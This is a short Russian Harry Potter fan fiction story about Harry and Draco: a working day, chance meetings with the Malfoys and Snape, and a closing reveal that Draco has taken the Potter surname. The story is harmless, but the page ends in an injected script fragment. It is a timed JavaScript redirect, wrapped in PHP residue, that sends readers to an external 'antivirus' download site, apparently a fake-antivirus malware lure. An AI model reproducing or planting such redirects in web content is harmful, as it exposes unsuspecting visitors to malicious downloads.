Мистер Поттер

Автор: Belegaer
Pairing: Гарри/Драко
Rating: PG
Категория: slash
Жанр: romance
Краткое содержание: за всё надо платить, но иногда оно того стоит.
Предупреждение: это просто маленькая шутка, никаких претензий на глубину или оригинальность.
Архивирование: пожалуйста, предупредите автора, если хотите разместить этот фик на другом сайте.
Disclamer: все персонажи, за исключением Марка из Рейвенкло, заимствованы из книг Дж. К. Роулинг. По-моему, у меня им лучше, чем там.

Что в имени тебе моём?

- Мистер Поттер, здесь последние данные по урожаю разрыв-травы, вам надо это посмотреть.

Молодой человек, к которому были обращены эти слова, бросил взгляд на часы (третий взгляд за последние пятнадцать минут). До конца рабочего дня ещё полчаса. Чёрт с ним, в конце концов, что за удовольствие быть самым молодым начальником отдела в Министерстве Магии, если никогда не нарушать трудовую дисциплину?

- Ладно, Марк, я займусь этим завтра прямо с утра.

В глазах юного секретаря отразилась сложная гамма чувств, от лёгкого осуждения до глубокого обожания. Марк, Марк, ты настоящий рейвенкловец, эрудированный, старательный, методичный. Но твой начальник, к сожалению, закончил другой факультет, где ценятся немного другие качества. Поэтому он проигнорировал твои укоризненно приподнятые брови.

А, кроме того, в этот летний вечер его ждали, и он не собирался опаздывать.

- До завтра, Марк, - когда ему этого хотелось, его улыбка ослепительно лучилась обаянием. Ну, что тут можно ответить? Только одно:

- До завтра, мистер Поттер!

Прекрасный вечер, чудесный ломтик лета, перевалившего за середину. Молодой человек, на ступеньках здания Министерства Магии, посмотрел на часы. У него есть полтора часа, нужно успеть в книжный магазин и потом добраться домой. Он чуть нахмурился, времени не так уж много.

На Диагон Аллее как всегда гудела толпа. Конечно, через три недели тут будет и вовсе не протолкнуться. Сюда заявятся орды школьников: первоклашек с широко раскрытыми от радостного предвкушения и немного от испуга глазами, шумных озорных учеников средних классов, серьёзных солидных выпускников. Это бывает в конце августа, но и в этот вечер народу было немало.

Молодой человек легко лавировал в толпе, временами отвечая на приветствия знакомых. Он был известной личностью, его узнавали. Но не он задерживался ни с кем, не в этот день, нет, у него мало времени. На мгновение его взгляд остановился на вывеске: «Мадам Малкин – одежда на все случаи жизни», красивые губы чуть тронула улыбка, он всегда улыбался, видя эту вывеску. У него с ней были связаны приятные воспоминания. Но дальше, дальше, к магазину с надписью «Флориш и Блоттс», сегодня ему сюда.

О, чёрт! У входа в книжную лавку он едва не столкнулся с красивой, элегантной парой. На мгновение все трое замерли как магловской фотографии. Женщина средних лет, но ещё очень моложавая, с прекрасными пепельными волосами, тонким бледным лицом, почти улыбнулась ему, почти решилась шагнуть навстречу. Но рука мужа, сжавшая ее локоть, остановила это движение. Молодой человек прямым взглядом встретил острый как рапира взгляд серых глаз высокого белокурого мужчины. Он не дрогнул, когда прозвучал голос исполненный ледяного высокомерия:

- Нарцисса, дорогая идём же, мы задерживаем… мистера Поттера.

Они разминулись в дверях, обменявшись поклонами. Изящными, идеально вежливыми, холодными. Безразличными.

Молодой человек вошёл в магазин, великолепная чета двинулась вверх по улице. Никто из них не обернулся.

- Здравствуйте, мистер Блоттс, я по поводу той книги о квиддиче, о которой мы говорили.

- О, разумеется, я помню. Всё готово, мистер Поттер.

Спустя четверть часа он уже шёл обратно. В руках он нес книгу, аккуратно и красиво завернутую в красно-зелёную бумагу. Очень аккуратно, это был подарок. Не совсем честный подарок, потому, что ему и самому тоже хотелось иметь эту книгу. Но что в этом плохого? Удовольствие, разделённое с тем, кого любишь удовольствие в двойне. А они делили теперь очень многое.

Он хотел просто пройти через «Дырявый котел», чтобы добраться до станции подземки. Но его остановил знакомый голос:

- Добрый вечер, ммм…, то есть, прошу прощения, мистер Поттер! – Красивый брюнет в траурно-чёрной мантии с иронией улыбался ему сидя за столиком в углу. – Позволите на правах бывшего преподавателя угостить вас сливочным пивом?

- Добрый вечер, профессор Снейп. Рад вас видеть. С удовольствием принял бы ваше предложение, но сегодня…

- Да-да семейное торжество, мистер Поттер – Насмешка Снейпа стала почти ядовитой. Профессор алхимии, конечно, не мог упустить случая, ещё раз подчеркнуто произнести знаменитое имя.

Но его бывший студент не обиделся, он слишком хорошо знал, Снейпа, чтобы обижаться на его шутки. Он просто улыбнулся человеку в вечном трауре и пошёл своей дорогой.

Они начали целоваться ещё в прихожей. Он думал об этом всю дорогу до небольшого коттеджа, прятавшегося в тени огромных кленов. Подарок едва распакованный остался на столике. Угольные волосы мешались с платиновыми, тела прижимались друг к другу все крепче, руки бродили по плечам и груди.

Вдруг молчание прорезал негромкий вскрик, скорее от изумления, чем от боли. Две пары глаз зелёных как листва и серых как рассвет уставились на кровоточащую царапину поперёк ладони. И на твёрдую заламинированную карточку, прикрепленную к чёрной мантии на груди.

- Сам виноват, дал бы мне переодеться по человечески, ничего бы не случилось.

Тонкие пальцы с жемчужными ногтями взялись за зажим, крепивший карточку к ткани. Но загорелая ладонь с поспешно зализанной царапиной накрыла их останавливающим жестом:

- Подожди, не снимай, она мне нравится.

- О! Вот уж не думал, что ты так честолюбив. Нравится спать с начальником Отдела Министерства?

- Ты о чём?

- Вот же там написано в третьей строчке «Начальник отдела по контролю за качеством зелий»

- Нет, мне гораздо больше нравится то, что написано в первой строке.

Ласковая улыбка ответила притворной гримасе, смуглая рука сжала тонкие изящные пальцы, скользившие по надписи на запаянном в пластик, словно в лёд вмороженном картоне: «Драко Л. Поттер»

- Чёрт, Гарри, до сих пор не могу поверить, что ты уговорил меня взять твою фамилию!

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>